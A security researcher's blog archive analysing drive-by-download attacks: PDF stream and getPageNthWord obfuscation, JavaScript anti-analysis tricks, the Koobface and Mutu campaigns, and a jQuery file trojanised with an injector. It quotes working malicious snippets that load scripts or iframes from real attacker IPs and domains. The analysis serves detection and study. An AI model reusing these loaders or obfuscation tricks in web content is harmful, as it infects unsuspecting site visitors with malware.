Menu:

Showing posts with tag wepawet. Show all posts.

Detection and Analysis of Drive-by-Download Attacks and Malicious JavaScript Code

Word cloud for the paper Detection and Analysis of Drive-by-Download Attacks and Malicious JavaScript Code

Tomorrow, I'm going to present our paper Detection and Analysis of Drive-by-Download Attacks and Malicious JavaScript Code at the WWW conference. The paper describes some of the techniques that we use to detect and analyze web pages that perform drive-by-download attacks, such as the ones that we analyze via Wepawet.

Here is the abstract:

JavaScript is a browser scripting language that allows developers to create sophisticated client-side interfaces for web applications. However, JavaScript code is also used to carry out attacks against the user's browser and its extensions. These attacks usually result in the download of additional malware that takes complete control of the victim's platform, and are, therefore, called "drive-by downloads." Unfortunately, the dynamic nature of the JavaScript language and its tight integration with the browser make it difficult to detect and block malicious JavaScript code.

This paper presents a novel approach to the detection and analysis of malicious JavaScript code. Our approach combines anomaly detection with emulation to automatically identify malicious JavaScript code and to support its analysis. We developed a system that uses a number of features and machine-learning techniques to establish the characteristics of normal JavaScript code. Then, during detection, the system is able to identify anomalous JavaScript code by emulating its behavior and comparing it to the established profiles. In addition to identifying malicious code, the system is able to support the analysis of obfuscated code and to generate detection signatures for signature-based systems. The system has been made publicly available and has been used by thousands of analysts.

See you in Raleigh!


Malicious PDF trick: multiple filters

Another simple trick that is often used by malicious PDF files consists of embedding the malicious JavaScript code in a PDF stream hidden below several stream filters.

Here is an example:

4 0 obj
<<
    /Length 2839
    /Filter [ /ASCIIHexDecode
        /LZWDecode
        /ASCII85Decode
        /RunLengthDecode
        /FlateDecode ]
>>stream
80124E6422E89C7A3517958CC302316CDE
...
08220861102A8595D813C3187E07C40400>
endstream
endobj

The stream's contents are decoded applying the specified 5 filters in order (ASCIIHexDecode, LZWDecode, ASCII85Decode, RunLengthDecode, and FlateDecode).

See this Wepawet report to find out what happens after the decoding is done. These malicious PDFs seem to also have decent detection on VirusTotal (6/41, at the time of writing).


Malicious PDF trick: getPageNthWord

PDF exploits are becoming more and more sophisticated. In particular, they often rely on creative techniques to avoid detection and slow analysis. For a couple of examples, see Julia Wolf's and Daniel Wesemann's nice analysis of malicious documents that use the getAnnots and info tricks, where the actual malicious content is stored as annotations or as part of the document metadata (e.g., the author name).

Here is another trick that showed up recently. I'll call it the getPageNthWord trick, from the key API function it uses.

The PDF contains a JavaScript section with the following code (simplified a little):

var s = '';

new Function(decode(2, 35))();

function decode(page, xor){
    var l = this.getPageNumWords(2);
    for(var i = 0; i < l; i++){
        word = this.getPageNthWord(page, i);
        var c = word.substr(word.length- 2, 2);
        var p = unescape("%"+ c).charCodeAt(0);
        s += String.fromCharCode(p ^ xor);
    }
    return s;
}

This code creates an anonymous function, sets its body to the return value of the decode function, and then executes it.

The interesting part is in the decode function. This function gets the number of words contained in the third page of the document via the getPageNumWords function (recall that pages are 0-based in the PDF API). It then loops through all the words in that page (via the getPageNthWord function) and manipulates them. Let's see how the third page looks like:

11 0 obj 
<<
/Length 23892
>>
stream
2 J
0.57 w
BT /F2 1.00 Tf ET
0.196 G
BT 31.19 806.15 Td ( kh29 kh2a kh55 
...
kh4e kh46 kh0a kh03 kh58 kh2e kh29) Tj ET
...
endstream
endobj

The page is stored as a stream. Its contents comprise a number of directives and the actual textual content. For example, BT indicates the beginning of the text and, conversely, ET marks the end of the text; 31.19 806.15 Td specifies the position of the text on the page; and Tj is the display text operator. The actual textual content is the string starting with kh29.

We can now go back to our decode routine. It is clear that it extracts the last 2 characters from each word (e.g., “29” from “kh29”), interprets them as hex numbers (e.g, 0x29), xors them with 35 (e.g., 0x29 ^ 35 = 10), and finally obtains the corresponding character (e.g., “\n”).

The result of this deobfuscation is the actual exploit code, which targets 4 different vulnerabilities. However, the exploit code has one last trick, which it uses to hide the URL from where the malware is to be downloaded:

var src_table = "abcd...&=%";
var dest_table= "eAFS...=iZR-";
function get_url(){
    var str = this.info.author;
    var ret = encode_str(str, dest_table, src_table);
    return ret;
};

Notice the info.author property. The get_url function essentially performs a simple substitution decryption of the author metadata. Let's see what is contained there:

17 0 obj 
<<
/Author
(-Jj.gw-Jjrj.-JWMyD-JjTWM-JjngM-JgkjW 
 ...
 -JjrWk-Jjrgw-JgTyM-Jy0g.-JWgyg-Jgngw-JgYgY-JyygM-Jy.yC)
>>
endobj

Ugly, indeed. After decoding, one finally gets the malware URL.

Wepawet now handles this type of malicious PDF files. See this report for an example.


CVE-2009-3459, CVE-2009-4324, and one PDF trick

PDF exploits—mostly targeting Adobe Reader and Acrobat programs—are very commonly used on drive-by web sites. This situation is probably the result of the widespread use of the Adobe plugin, a rather large of number of vulnerabilities found in it, and reliable exploitation techniques.

Two recent vulnerabilities for which I have added detection in Wepawet are CVE-2009-3459 and CVE-2009-4324 (click on the links to see analysis reports of two malicious samples). The former is an integer overflow in the PDF parser, the latter is a bug in the JavaScript interpreter.

The analysis of malicious PDF files is often complicated by the use of various obfuscation (or better, “confusion”) techniques. In particular, malicious PDF files are often malformed: expected sections are missing entirely, others are truncated. The attacks are still successful because Adobe Reader does a good job at automatically repairing the damaged file. Of course, analysis tools are not necessarily as good at that.

I recently found an interesting, small trick that was used in the wild. A little background first. A stream is a basic object (technically, a dictionary) used in PDF files to contain arbitrary content. In particular, malicious PDFs use streams to contain the JavaScript code used to launch an exploit. The Length entry in the stream dictionary is used to specify, you guessed it, the length of the encoded content. According to the PDF specification (Section 7.3.8.2 for the curious), the length is to be specified as an integer. The sample I found, however, used an expression (a sum) to declare the stream length in the length declaration.

obj
<</ / / / /Filter/ASCIIHexDecode/Length 100000+12488>>
stream
... stream contents ...
endstream
endobj

Lessons learned: do not trust specs and be a little lenient in the parsing of PDF files...

Update 1/7/2010: Richard B. pointed out that Acrobat seems to detect that the length specification is malformed, discards it, and falls back to a simple parsing strategy to extract the stream contents. Thanks!


JavaScript anti-analysis tricks: last-modified

Writers of malicious JavaScript code have always been keen on developing novel ways to make the analysis of their code harder. One of the most commonly used mechanisms to do so is (no surprise here) simple obfuscation. For example, malware authors commonly encode string literals with custom schemes. A decoding routine then de-scrambles the strings before using them further (for example, as the URL of the next step of an attack or as the CLSID of a vulnerable ActiveX control).

Interestingly, malware authors have also introduced various techniques to make the basic deobfuscation step more difficult, in particular, if performed in an off-line analysis environment, which, for example, examines the pages saved during a crawling session.

One of the earliest trick consists of using the URL of the obfuscated page as a decoding key in the deobfuscation routine. More recently, other techniques have also been used. One I have seen lately uses the time of the last modification of the page in the decoding routine.

Consider, for example, the following script:

<html><body><script>
var gtvwx=true,abwz="",gnru=false,
  bfqrv=document.lastModified.split("/"),
  dilp=String,
  cjltu=bfqrv[2].split(":"),
  acinqu=dilp['f#r(o#mZC#h#aZrZC(o,d#e('.replace(/[\(Z,G#]/g,'')],
  gnty=bfqrv[0]+"25"+cjltu[2],
  ckoxz=window,cklqry=0,klny="",
  bfkw=ckoxz['euv9a2lS'.replace(/[S2u9@]/g,'')],
  fopv=[150,173,160...90,94,111],
  ailmux=function(){
    for(var ehlt;cklqry<fopv.length;cklqry++){
        klny+=acinqu(fopv[cklqry]-
          gnty.substring(cklqry%gnty.length,cklqry%gnty.length+1).charCodeAt(0));
        bfkw(klny);
  };
ailmux();
</script></body></html>

The code reads the time the page was last modified from the document.lastModified property. This property is initialized from the value of the Last-Modified header sent from the web server serving the page. The script then parses the time and extracts the number of seconds from the time string into the cjltu variable. The seconds value is then used to compute the value of the gnty variable, which is used in the decoding routine to recover the in-the-clear text from the encoded array fopv..

These are the Wepawet reports for a couple of sites that use this techniques: report for hxxp://www.pipisechka.com/sleep/news.php and report for hxxp://day-evryday.cn/news.php


Mutu campaign on BlogSpot

A new malware campaign is currently abusing BlogSpot. I'll call it the "Mutu" campaign from the text that is found on the malicious pages. I have so far detected almost 400 blogs that are actively involved in the campaign.

A malicious blog looks like the following picture. Note that the actual text, layout, and color themes may vary across different pages.

A malicious "Mutu" blog on BlogSpot

A malicious page contains a script tag similar to the following:

<script language="javascript">
location.href='\u0068\u0074\u0074\u0070\u003a\u002f\u002f'
  + unescape('%77%77%77%2e%78')+unescape('%78%78%6f%64')
  +'\u006e\u006f\u006b\u006c\u0061\u0073'+'sniki'
  +unescape('%2e%63%6f%6d%2f')+unescape('%3f%61%64')
  +unescape('%76%3d%67%61%72')+'bunov'+''
</script>

The script causes the victim's browser to fetch a malicious (or at least dubious) page from one of several domains. These are the domains that are currently being redirected to:

Some of these domains appear to be selling various items (cell phone, drugs). However, others (at least afsharteam1.com) launch drive-by-download attacks. As a result, a malware with limited and generic detection on VirusTotal gets downloaded and launched on the vicitm's machine. For more details, see the Wepawet report for bertilladingman36429.blogspot.com, a blog that redirects to drive-by attacks.


Liberty exploit toolkit

Here is another exploit toolkit that has been making the rounds recently: the Liberty exploit pack. Most notably, in mid-September, Liberty was used in a drive-by-download campaign that injected iframes pointing at searra-ditol.cn and embrari-1.cn into a large number of vulnerable web sites.

A couple of pages from the toolkit admin panel:

Finally, you can see the Wepawet domain report for searra-ditol.cn and for embrari-1.cn.


JavaScript anti-analysis tricks: 404 status code

Here is an old trick for foiling manual and automated analysis of malicious pages that I still see used from time to time. When the malicious page is requested, the server sends back a 404 ("Not Found") HTTP status code. Regularly, this error message indicates that the requested resource could not be found on the server, and the returned page simply tries to help the visitor correcting the error. However, in the case of malicious pages that use this trick, the body of the apparently missing page contains code that attempts to exploit some browser vulnerabilities or to redirects to other malicious web sites.

The following is an example of a page (hxxp://yahoo-analytics.net/laso/s.php) that uses this technique:

HTTP/1.1 404 Not Found
Date: Tue, 29 Sep 2009 07:26:41 GMT
Server: Apache/2
Last-Modified: Tue, 01 Sep 2009 12:55:36 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 133
Content-Type: text/html

<iframe src="http://213.163.89.54/lib/index.php" 
   width=0 height=0
   style="hidden" 
   frameborder=0 marginheight=0 marginwidth=0
   scrolling=no>
</iframe>

The headers indicate that the page is missing, but the body contains an iframe that redirects the browser to a page that launches various browser exploits. Of course, stopping the analysis after observing the 404 error code would not reveal any wrongdoing. A complete analysis instead (see the Wepawet report for hxxp://yahoo-analytics.net/laso/s.php for all the details) shows that after the redirection a malicious PDF and Flash files are delivered to the visitor's browser.


A gallery of fake koobface pages

Long time, no write... but I thought this could be a good occasion to start again.

It looks like the Koobface people have been busy updating their social engineering tricks. But let's start from the beginning. I was inspecting fnplbpnbvxqjrey.blogspot.com, a BlogSpot's blog that Wepawet flagged as suspicious and involved in pushing Koobface (see the Wepawet report for fnplbpnbvxqjrey.blogspot.com). At first sight, the blog appears to be just one of the many BlogSpot pages involved in this activity.

However, a closer look at the source code of the page reveals something interesting. The code responsible for actually redirecting to Koobface is a fairly recent variant (I have seen it used as early as 2009-09-12). Here is a slightly simplified listing of this code:

var ogxbjeqrihscndvz6 = [ /* list of server IPs */ ];
var mzvtonlxsjprcb5 = '';

cvuhxdinmlqjoeft1();
var js = '/view';
var n = location.href.indexOf('?id=');
if (n != -1) {
  n = parseInt(location.href.substr(n + 4));
  if (n < 101) 
    js = '/cnet';
  else if (n < 201) 
    js = '/warn';
  else if (n < 301) 
    js = '/scan';
  else if (n < 401) 
    js = '';
}
for (var onwxklrqhybjvpase3 = 0; 
     onwxklrqhybjvpase3 < ogxbjeqrihscndvz6.length; 
     onwxklrqhybjvpase3 ++) {
  var ypcovhrtbmn8 = document.createElement('script');
  ypcovhrtbmn8.type = 'text/javascript';
  ypcovhrtbmn8.src = 'http://' + ogxbjeqrihscndvz6[onwxklrqhybjvpase3] + 
    '/go' + '.js' + '?0x3' + 'E8' + mzvtonlxsjprcb5 + js + '/' + 
    (location.search.length > 0 ?  location.search : '');
  document.getElementsByTagName('head')[0].appendChild(ypcovhrtbmn8);
}

The script loops over an array that holds the IPs of compromised machines where visitors of the malicious blog will be redirected to. For each IP, an HTML script tag is added to the page. The tag is set to point to a URL on the compromised IP. Depending on certain conditions, the path of the URLs will contain one of the following strings: /view, /cnet, /warn, /scan. When the redirection finally is triggered, the victim is presented with a different page, depending on which of these strings was included in the URL.

All the pages attempt to social engineer visitors into downloading and installing the Koobface malware. Here are screenshots that show the tricks they use:

Just a few more aces up Koobface's sleeve...


JavaScript anti-analysis tricks: IE conditional compilation

An anti-analysis/fingerprinting trick I've noticed more and more frequently in drive-by downloads is the use of IE conditional compilation.

Conditional compilation is a feature of Internet Explorer that enables the browser to control the compilation of a script (that is, to include or exclude code to be interpreted) depending on the values of a number of conditional compilation variables. Predefined variables provide information about the client environment, such as its processor, OS, and JavaScript version. Conditional compilation statements are typically contained in regular JavaScript comments to prevent problems with browsers that do not support this feature.

Here is an example of how conditional compilation is used in drive-by downloads:

/*@cc_on @*/
/*@if (@_win32)
var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00:6" +
    "/23:/255/33:0tubut0tubut/kt#?=0tdsjqu?";
var result = "";
for(var i=0;i<source.length;i++)
    result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);
/*@end @*/

The cc_on statement enables conditional compilation. The @if statement checks that the browser is running on a Win32 system. If this is the case, then the following JavaScript block is interpreted, otherwise it is simply ignored. The code block is a classic deobfuscation routine that produces the following text:

<script type="text/javascript" 
    src="http://95.129.144.229/stats/stats.js"></script>

This script tag fetches a script that redirects to a number of pages serving exploits.

What happens if the user's browser does not support conditional compilation, for example, it is an analysis tool based on the stock SpiderMonkey or Rhino engines? Then, it will simply consider the entire conditional compilation section a comment and it will skip it. As a consequence, the malicious script tag will not be added to the page, and, therefore, the subsequent exploits will not be launched and will not be detected by the analysis tool.

The full report for the example is available on Wepawet.


JavaScript anti-analysis tricks: /textarea

Malicious JavaScript code often relies on defensive mechanisms to evade detection or to make its deobfuscation more difficult. Some of these methods have been well discussed (see, for example, the very nice presentations Reverse Engineering Malicious Javascript by J. Nazario and Circumventing Automated JavaScript Analysis by B. Hoffman), but it's interesting to see how they are used.

Some of the earliest defensive techniques are directed against the manual analysis of malicious code. For example, a quick analysis technique consists of wrapping the script's code into textarea tags so that deobfuscated code is written into the textarea and can be quickly inspected and copy-and-pasted for further analysis. In this case, the textarea is essentially used as a poor-man sandbox. Something the bad guys figured out quickly was that all they needed to do to defeat this technique was to close the textarea tag before performing any other action.

Somewhat surprisingly, this trick is still used from time to time. A few months ago, a malicious script on ixfree.net contained the following code:

document.write("</textarea>");
var i, _, a = ["78.110.175.21", "195.24.76.251"];
_ = 1;
if (document.cookie.match(/\bhgft=1/) == null)
    for (i = 0; i < 2; i++)
        document.write("<script>if(_)" +
            "document.write(\"<script id=_" + i + "_ src=//" + a[i]" + 
            "/cp/?" + navigator .appName.charAt(0) + 
            "><\\/script>\")<\/script>");

(see full report on Wepawet)

The code closes the textarea to escape its "sandbox", checks that a cookie is not set, and then generates two script tags that redirect to exploits. If you were to wrap this code into a textarea, you would end up with an empty textarea and a wrong detection.


Malicious "jquery"

A social engineering trick that the people behind drive-by downloads are using is that of hiding their malicious code in the middle of benign, well-know code.

For example, recently, a number of compromised web sites have found their pages modified with iframes pointing at hxxp://94.247.2.195/jquery.js. At a cursory inspection, jquery.js looks like the jQuery library, a well-known (and definitely benign) JavaScript library. The code includes the standard jQuery's copyright notice and revision information, and the first 6K bytes or so are indeed identical to the original library's code.

/*
 * jQuery JavaScript Library v1.3.1
 * http://jquery.com/
 *
 * Copyright (c) 2009 John Resig
 * Dual licensed under the MIT and GPL licenses.
 * http://docs.jquery.com/License
 *
 * Date: 2009-01-21 20:42:16 -0500 (Wed, 21 Jan 2009)
 * Revision: 6158
 */
(function(){var l=this,g,y=l.jQu...

However, the malicious code is hidden toward the end of the script, where one finds:

if( (typeof(jquery_data)!=typeof(1)) && 
    (document.cookie.match(/\miek=1/)==null))
  document.write(
    unescape('fq%3CssoWcOTHriDpgpsoWt...FH5rscDpgrRpiptRp%3E')
      .replace(/soW|VV|U6k|rV|fq|OTH|H5r|Dpg|Rp/g,"")
      .replace(/Z/,navigator.appName.charAt(0)=='M'?'0':'1'));
jquery_data=1;

This code determines whether an attack has already been launched, by checking the jquery_data variable and the miek cookie. If not, it deobfuscates a long string and writes it in the current page. The deobfuscated string creates a new script tag which points at hxxp://94.247.2.195/news/?id= The value of the id parameter in the script URL is 100 if the codename of the browser starts with the letter M (e.g., Firefox and Internet Explorer), 101 in all other cases. This page, in turn, attempts to launch a number of exploits (see the Wepawet report). The exploits target vulnerabilities in MDAC, PDF, and SWF.

It's certainly true: thing are not always what they seem...